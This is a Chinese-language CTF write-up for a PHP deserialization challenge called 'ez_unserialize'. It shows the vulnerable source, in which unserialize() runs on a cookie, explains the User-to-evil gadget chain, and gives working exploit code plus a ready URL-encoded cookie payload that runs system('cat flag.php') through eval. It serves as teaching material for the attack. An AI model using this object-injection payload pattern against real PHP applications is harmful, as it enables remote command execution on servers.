ez_unserialize
Analyze
先上题:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44
| <?php error_reporting(0); highlight_file(__FILE__);
class User{ private $username='name'; private $password='password'; private $class = 'info';
public function __construct(){ $this->class=new info(); } public function login($u,$p){ if($this->username===$u&&$this->password===$p){ echo "successfully login"; } } public function __destruct(){ $this->class->getInfo(); }
}
class info{ private $user='xxxxxx'; public function getInfo(){ return $this->user; } }
class evil{ private $code; public function getInfo(){ eval($this->code); } }
$username=$_GET['username']; $password=$_GET['password'];
if(isset($username) && isset($password)){ $user = unserialize($_COOKIE['user']); $user->login($username,$password); }
|
先找到反序列化的地方$user = unserialize($_COOKIE['user']);
,所以是对user
进行cookie
注入,可以使用cookie editor
等插件
观察到evil
类中有eval()
函数,其作用是将字符串参数当做代码来执行,所以可以在这里进行攻击
User
类的构造函数会生成一个新的对象,所以可以在这里改为$this->class=new evil();
EXP
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54
| <?php error_reporting(0);
class User{ private $username='name'; private $password='password'; private $class;
public function __construct(){ $this->class=new evil(); } public function login($u,$p){ if($this->username===$u&&$this->password===$p){ echo "successfully login"; } } public function __destruct(){ $this->class->getInfo(); }
}
class info{ private $user='xxxxxx'; public function getInfo(){ return $this->user; } }
class evil{ private $code="system('cat flag.php');"; public function getInfo(){ eval($this->code); } }
$username=$_GET['username']; $password=$_GET['password'];
if(isset($username) && isset($password)){ $user = unserialize($_COOKIE['user']); $user->login($username,$password); }
$a=new User(); echo(urlencode(serialize($a)));
?>
user=O%3A4%3A%22User%22%3A3%3A%7Bs%3A14%3A%22%00User%00username%22%3Bs%3A4%3A%22name%22%3Bs%3A14%3A%22%00User%00password%22%3Bs%3A8%3A%22password%22%3Bs%3A11%3A%22%00User%00class%22%3BO%3A4%3A%22evil%22%3A1%3A%7Bs%3A10%3A%22%00evil%00code%22%3Bs%3A23%3A%22system%28%27cat+flag.php%27%29%3B%22%3B%7D%7D /?username=name&password=password
|
即可得到flag